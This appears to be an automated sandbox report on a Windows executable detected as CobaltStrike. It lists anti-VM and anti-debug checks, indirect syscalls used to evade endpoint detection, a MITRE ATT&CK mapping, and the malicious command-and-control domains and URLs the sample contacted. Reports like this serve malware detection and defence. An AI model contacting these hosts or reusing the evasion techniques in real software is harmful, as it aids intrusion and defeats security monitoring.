Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\O6O7O5REot.exe TID: 3068

Thread sleep time: -34146s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\O6O7O5REot.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\O6O7O5REot.exe

Thread delayed: delay time: 34146

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: O6O7O5REot.exe, 00000000.00000003.1448700180.000001EA82C33000.00000004.00000020.00020000.00000000.sdmp, O6O7O5REot.exe, 00000000.00000003.1451908145.000001EA82C34000.00000004.00000020.00020000.00000000.sdmp, O6O7O5REot.exe, 00000000.00000003.1451761865.000001EA82C34000.00000004.00000020.00020000.00000000.sdmp, O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\O6O7O5REot.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\O6O7O5REot.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\O6O7O5REot.exe	NtDeviceIoControlFile: Indirect: 0x7FF76BA3A81E			Jump to behavior
Source: C:\Users\user\Desktop\O6O7O5REot.exe	NtCreateFile: Indirect: 0x7FF76BA41974			Jump to behavior

Source: C:\Users\user\Desktop\O6O7O5REot.exe

Code function: 0_2_000001EA846A2FA8 GetUserNameA,strrchr,_snprintf,

0_2_000001EA846A2FA8

Source: C:\Users\user\Desktop\O6O7O5REot.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1857226561.000001EA82D50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1451999701.000001EA84640000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: O6O7O5REot.exe PID: 3324, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	21 Virtualization/Sandbox Evasion	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Process Injection	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Abuse Elevation Control Mechanism	NTDS	1 System Owner/User Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	2 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
O6O7O5REot.exe	18%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sgp.file.myqcloud.com	43.152.64.207	true	false	unknown
img.bilibili.buzz	unknown	unknown	true	unknown
intl-web-1305970982.cos.ap-singapore.myqcloud.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
img.bilibili.buzz	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://img.bilibili.buzz/8	O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C97000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://code.jquery.com/	O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C97000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.6.dr	false	URL Reputation: safe	unknown
https://img.bilibili.buzz:2096/(	O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C97000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://intl-web-1305970982.cos.ap-singapore.myqcloud.com/Shorts/1.pdfC:	O6O7O5REot.exe	false		unknown
https://img.bilibili.buzz:2096/jquery-3.3.1.min.js	O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C77000.00000004.00000020.00020000.00000000.sdmp, O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C47000.00000004.00000020.00020000.00000000.sdmp, O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C8A000.00000004.00000020.00020000.00000000.sdmp, O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C97000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img.bilibili.buzz/0	O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C97000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://intl-web-1305970982.cos.ap-singapore.myqcloud.com/Shorts/1index.jpg	O6O7O5REot.exe	false		unknown
https://img.bilibili.buzz:2096/jquery-3.3.1.min.jst	O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C77000.00000004.00000020.00020000.00000000.sdmp, O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C47000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img.bilibili.buzz/	O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C1B000.00000004.00000020.00020000.00000000.sdmp, O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C97000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img.bilibili.buzz:2096/	O6O7O5REot.exe, 00000000.00000002.1856934216.000001EA82C97000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
43.152.64.207	sgp.file.myqcloud.com	Japan		4249	LILLY-ASUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1535737
Start date and time:	2024-10-17 09:15:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	O6O7O5REot.exe renamed because original name is a hash value
Original Sample Name:	88b89cfbfb1acd45472205f4cca9013ace78f1ef97c0a3007f4604904d32fb73.exe
Detection:	MAL
Classification:	mal80.troj.evad.winEXE@3/5@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: O6O7O5REot.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
43.152.64.207	SO2mdwWVvg.exe	Get hash	malicious	CobaltStrike	Browse	/Shorts/index.jpg

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sgp.file.myqcloud.com	SO2mdwWVvg.exe	Get hash	malicious	CobaltStrike	Browse	43.152.64.207
	LisectAVT_2403002B_132.exe	Get hash	malicious	Unknown	Browse	43.152.64.193
	LisectAVT_2403002B_132.exe	Get hash	malicious	Unknown	Browse	43.152.64.207
	LisectAVT_2403002B_185.exe	Get hash	malicious	Unknown	Browse	43.153.232.152
	LisectAVT_2403002B_185.exe	Get hash	malicious	Unknown	Browse	43.153.232.152
	LisectAVT_2403002B_246.exe	Get hash	malicious	Unknown	Browse	43.152.64.207
	LisectAVT_2403002B_246.exe	Get hash	malicious	Unknown	Browse	43.153.232.151
	LisectAVT_2403002B_295.exe	Get hash	malicious	Unknown	Browse	43.152.64.207
	LisectAVT_2403002B_295.exe	Get hash	malicious	Unknown	Browse	43.152.64.193

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LILLY-ASUS	SO2mdwWVvg.exe	Get hash	malicious	CobaltStrike	Browse	43.152.64.207
	m68k.elf	Get hash	malicious	Mirai	Browse	43.110.37.159
	1kqLF3lHvm.elf	Get hash	malicious	Mirai	Browse	40.245.243.144
	JFX7sO1HHj.elf	Get hash	malicious	Mirai	Browse	43.2.146.57
	JJLOVjVrYv.elf	Get hash	malicious	Mirai, Gafgyt	Browse	43.223.172.145
	VysS7K9PPz.elf	Get hash	malicious	Mirai	Browse	43.87.11.124
	VDRitLeYgi.elf	Get hash	malicious	Mirai, Gafgyt	Browse	42.132.41.46
	db0fa4b8db0333367e9bda3ab68b8042.x86.elf	Get hash	malicious	Mirai, Gafgyt	Browse	42.221.122.176
	db0fa4b8db0333367e9bda3ab68b8042.i686.elf	Get hash	malicious	Mirai, Gafgyt	Browse	43.74.84.202

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_O6O7O5REot.exe_96784ee68f26aa982fc83554df0767665a575b_bbec5281_a491f4d0-9a5e-415e-974f-2768cf823592\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9192339576468121
Encrypted:	false
SSDEEP:	96:t3gFdHAy2sCkfzxymfhQXIDcQHc6OcEXcw3Mo+HbHg/5HnQVnMn7+xnjiqKeCzqh:eHHF20E0ZKdqjOXuzuiF5Z24lO8N
MD5:	4D2708E71E1F112BB4C058F2D845C70C
SHA1:	CE047C6546E49A52EB7EDE7254F175823C9578CD
SHA-256:	1611319B22CE3AD64D4B3948700EA02E62E43A0F7B5DC24B822112D491BCF2C7
SHA-512:	1B5A29DE77CF24BFD9B426B476832F538FCECF729CC38E8091AE77844548F45A2F2C7ABA728620083BC92A753834542C50DC8D8DCBC90B10884E7DFF532AC577
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.6.2.2.9.7.1.5.6.5.9.0.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.6.2.2.9.7.1.9.8.7.7.9.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.9.1.f.4.d.0.-.9.a.5.e.-.4.1.5.e.-.9.7.4.f.-.2.7.6.8.c.f.8.2.3.5.9.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.d.a.2.4.e.4.-.3.a.3.f.-.4.3.3.9.-.b.f.1.2.-.6.c.e.9.4.8.8.2.e.e.6.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.O.6.O.7.O.5.R.E.o.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.f.c.-.0.0.0.1.-.0.0.1.4.-.b.8.e.5.-.1.2.7.0.6.4.2.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.5.9.1.7.9.9.e.f.e.4.1.1.6.d.6.3.e.7.b.9.c.7.d.9.e.4.0.4.d.7.2.0.0.0.0.0.9.0.4.!.0.0.0.0.8.c.f.5.9.1.e.0.9.9.7.9.5.9.f.8.a.8.d.f.7.6.f.a.1.2.e.6.b.0.f.6.7.4.7.c.6.b.9.c.!.O.6.O.7.O.5.R.E.o.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.1.5.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB918.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Oct 17 07:16:11 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	140766
Entropy (8bit):	1.5061767886837514
Encrypted:	false
SSDEEP:	768:v9tU4LOhGCsYNiNycvY3tRTJHRjZPRVHF1ik:XmwCsYwNycvY3tRTJHRjZPRVHF1ik
MD5:	ABE6814D4DA336D0E9C0FB0EBFE40A21
SHA1:	437C2BF76F4B41C07D7C11F1E7DC7C480F603290
SHA-256:	7A14FB8F6D117418516E9196516866FAF91410D04C08DF1C52FF6C4F37021B7A
SHA-512:	1AD5786208DF8A0CA3472B02F1DB9355D2E3E6870D89128D9D8D005C705E9D48010D4EEC329CE3AB306D73DC22D01C1F25ED444C49E9322C13DB8228B237BD2D
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........g.........................................S..........`.......8...........T...........`#..~...................................L...............................................................................eJ......\.......Lw......................T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9C5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8746
Entropy (8bit):	3.703140052935044
Encrypted:	false
SSDEEP:	192:R6l7wVeJpDy2G6YStY51cgmfu0G4BQprH89bhjz6kf0zLm:R6lXJpDbG6YoY51cgmfu74BNhjzRf7
MD5:	C70BE3EED8328C4A2FB839170A144A30
SHA1:	B52D537A40E2AE43B733019C5EACC7908AA69627
SHA-256:	F0EE2AA846A3658C74A6DAE4F755B394EE3631ADC5C7A33D356AC71C62A9A33A
SHA-512:	58B6CC83ED9686155FF863F3D4930DD8BB8F51638BA64BD9DAA1B80943663E43BF39681072CBB63E020B6E11B0E7CD32A10E8CF81AC80D1E38524BE0E0E47530
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.3.2.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB9F5.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4658
Entropy (8bit):	4.4913182702565155
Encrypted:	false
SSDEEP:	48:cvIwWl8zsZJg771I9jQrWpW8VY0Ym8M4JpKF3OHyq85SjdjmvE+YWd:uIjfrI7ER7VYJ0OHrjmvE+YWd
MD5:	761680075D21DA781F2199B405532120
SHA1:	5BF099D55171B13DBCEC7A52E1A711828A86910D
SHA-256:	4394AEC8B0FCAD0E5B5987F8CA4EB8D2F791CB46F8EF5D36618437B4920ECD35
SHA-512:	A879DE8C87709F9184334520C0CC5B700F9A3C68B51A8EEAAC01E17746A5615B806C68E86FB35601790F64BF3344BB51D00D742066D5B18B970CA823C176E194
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="547098" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.372263157864645
Encrypted:	false
SSDEEP:	6144:IFVfpi6ceLP/9skLmb0HyWWSPtaJG8nAge35OlMMhA2AX4WABlguN1iL:wV1tyWWI/glMM6kF7jq
MD5:	0C73A6A41DF1A0119A8877B254A1D159
SHA1:	EF081BD55F31F9D9FB319A9EA8C1BE08F27D9996
SHA-256:	0BB6F34D6BF6348D4513C276C04413E3C371B16E3B573B75EF5B7242B1FF717C
SHA-512:	290289B10941A467D3C91DE320DA5EAF6ADA89797B462E2821574B5F0F0840A244D298AAB3B0D34A16645CA06A9496AE1EA8AC459A77FF04B17A769A412B2D6E
Malicious:	false
Reputation:	low
Preview:	regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...qd ..............................................................................................................................................................................................................................................................................................................................................<s.E........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.441004784109127
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	O6O7O5REot.exe
File size:	8'199'168 bytes
MD5:	eef4506fa429532fdb0f3648e3971b2a
SHA1:	8cf591e0997959f8a8df76fa12e6b0f6747c6b9c
SHA256:	88b89cfbfb1acd45472205f4cca9013ace78f1ef97c0a3007f4604904d32fb73
SHA512:	a65688ccb90e4f88ae8b4e046c973f5efac7eca84fafecc423f7f7ffffb7b746a3a034d3c27b316f87def2e7bd9f2559d16e17c92db92cc91cb7f45c52272ff0
SSDEEP:	49152:1/gb2XD3nGmNxMyVtHaTJ29oTx/hwR6jKCT87F6ZUREXJifdHQOOt85OGsIf1aBO:6b2T5atlMxQj6OlIf1aG6p9DOl4ZU7n
TLSH:	3B869E13E9A41AF4D4ABCA34812E63317B717A9DD714CBB30A35C3716F52291EF0BA58
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......g..{..[....&....&.$*...R................@..............................~.....Z]....`... ............................

File Icon


Icon Hash:	0000000000000000

Static PE Info

General

Entrypoint:	0x1400014d0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x670DFDE9 [Tue Oct 15 05:30:17 2024 UTC]
TLS Callbacks:	0x402577d0, 0x1, 0x402a2250, 0x1, 0x402a2220, 0x1
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	313bee101a2d8b6978c2a31a286c9956

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [0039AAE5h]
mov dword ptr [eax], 00000000h
call 00007F20B0C9918Fh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
call 00007F20B0F3A0F4h
dec eax
test eax, eax
sete al
movzx eax, al
neg eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
push esi
push edi
dec eax
sub esp, 28h
dec eax
mov esi, dword ptr [ecx]
dec eax
test esi, esi
je 00007F20B0C9953Dh
dec eax
mov ecx, esi
call 00007F20B0E4431Fh
dec eax
mov eax, dword ptr [esi+10h]
dec eax
dec dword ptr [eax]
jne 00007F20B0C994FBh
dec eax
lea ecx, dword ptr [esi+10h]
call 00007F20B0C9A15Ch
dec eax
cmp dword ptr [esi+18h], 00000000h
je 00007F20B0C99502h
dec eax
mov eax, dword ptr [esi+40h]
dec eax
test eax, eax
je 00007F20B0C994F9h
dec eax
mov ecx, dword ptr [esi+48h]
call dword ptr [eax+18h]
mov edx, 00000070h
inc ecx
mov eax, 00000008h
dec eax
mov ecx, esi
dec eax
add esp, 28h
pop edi
pop esi
jmp 00007F20B0C9FFBCh
nop
dec eax
add esp, 28h
pop edi
pop esi
ret
dec eax
mov edi, eax
jmp 00007F20B0C99524h
dec eax
